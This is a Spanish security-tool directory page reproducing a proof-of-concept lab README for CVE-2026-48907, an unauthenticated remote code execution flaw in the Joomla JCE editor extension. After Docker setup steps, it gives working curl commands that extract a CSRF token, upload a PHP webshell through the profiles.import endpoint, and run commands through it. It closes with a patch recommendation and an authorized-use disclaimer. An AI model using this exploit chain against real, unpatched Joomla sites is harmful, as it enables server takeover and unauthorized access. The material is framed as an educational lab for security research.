Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-48907 — PoC para CVE-2026-48907 | Kitploit
Herramientas/GitHubGitHub/pssec-io/cve-2026-48907
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de PayloadsLabs y Práctica
GitHubpssec-io/cve-2026-48907

CVE-2026-48907

PoC para CVE-2026-48907

Ver Repositorio
1hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-48907 — Laboratorio de RCE no autenticado en Joomla JCE

PSsec Laboratorio educativo de investigación de seguridad para CVE-2026-48907.


Resumen

CVE-2026-48907 es una vulnerabilidad crítica (CVSS 10.0) de ejecución remota de código no autenticada en JCE (Joomla Content Editor), la extensión de editor más instalada para Joomla, que afecta a todas las versiones ≤ 2.9.99.4.

El endpoint profiles.import acepta cargas de archivos sin ninguna autenticación. Un atacante puede subir un archivo PHP malicioso disfrazado de perfil XML, que se escribe en el directorio tmp/ del servidor y se ejecuta directamente a través de HTTP — sin necesidad de credenciales.

DetalleValor
CVECVE-2026-48907
Puntuación CVSS10.0 Crítico
Versiones afectadasJCE ≤ 2.9.99.4
Versiones corregidasJCE ≥ 2.9.99.5
En la lista KEV de CISASí — 16 de junio de 2026
Explotado activamenteSí

Configuración del laboratorio

Requisitos previos

  • Docker + Docker Compose
  • Kali Linux (o cualquier host Linux)

1. Iniciar el entorno vulnerable

root@kitploit:~
docker compose up -d

2. Completar el instalador de Joomla

Abre http://localhost:8080 en tu navegador y completa el asistente de configuración con estas credenciales:

CampoValor
Host de la base de datosdb
Nombre de la base de datosjoomla
Usuario de la base de datos

3. Instalar la extensión JCE vulnerable

root@kitploit:~
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip

Luego, en el Administrador de Joomla → Sistema → Extensiones → Instalar → sube el ZIP.


Explotación

4. Extraer el token CSRF y la cookie de sesión

root@kitploit:~
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
  | sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
  | head -n1)

5. Subir una webshell PHP mediante la importación de perfil no autenticada

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  -F "[email protected];type=application/xml" \
  -F "task=profiles.import" \
  -F "${TOKEN}=1" \
  "$URL/index.php?option=com_jce"

6. Verificar la ejecución remota de código

root@kitploit:~
curl -i -s -b cookies.txt -c cookies.txt \
  "$URL/tmp/shell.xml.php?cmd=id"

Salida esperada: uid=33(www-data) gid=33(www-data)


Archivos

ArchivoDescripción
docker-compose.ymlLevanta un Joomla 5.3.1 vulnerable + MySQL 8.0
shell.xml.phpPayload mínimo de webshell PHP
instructions.txtNotas de explotación paso a paso

Mitigación

Actualiza JCE a la versión 2.9.99.5 o posterior de inmediato.

Aviso oficial del proveedor y parche gratuito para versiones antiguas de Joomla: Actualización de seguridad de JCE — joomlacontenteditor.net


Créditos

  • Referencia de herramientas de explotación: JoomlaSniper por ynsmroztas
  • Vulnerabilidad descubierta en explotación activa por Phil Taylor de mySites.guru
  • Inclusión en KEV de CISA: 16 de junio de 2026

Descargo de responsabilidad

Este repositorio está destinado estrictamente a fines educativos y de investigación de seguridad autorizada.

Las pruebas solo deben realizarse contra sistemas que sean de tu propiedad o para los que tengas permiso explícito por escrito. El uso no autorizado de este material contra sistemas que no te pertenecen es ilegal y poco ético. Los autores y Pansophical OU no aceptan ninguna responsabilidad por el mal uso de este contenido.

Este entorno de laboratorio es intencionalmente vulnerable. No lo expongas a internet ni a ninguna red no confiable.


Por PSsec

Descargar herramienta
joomla
Contraseña de la base de datosjoomlapass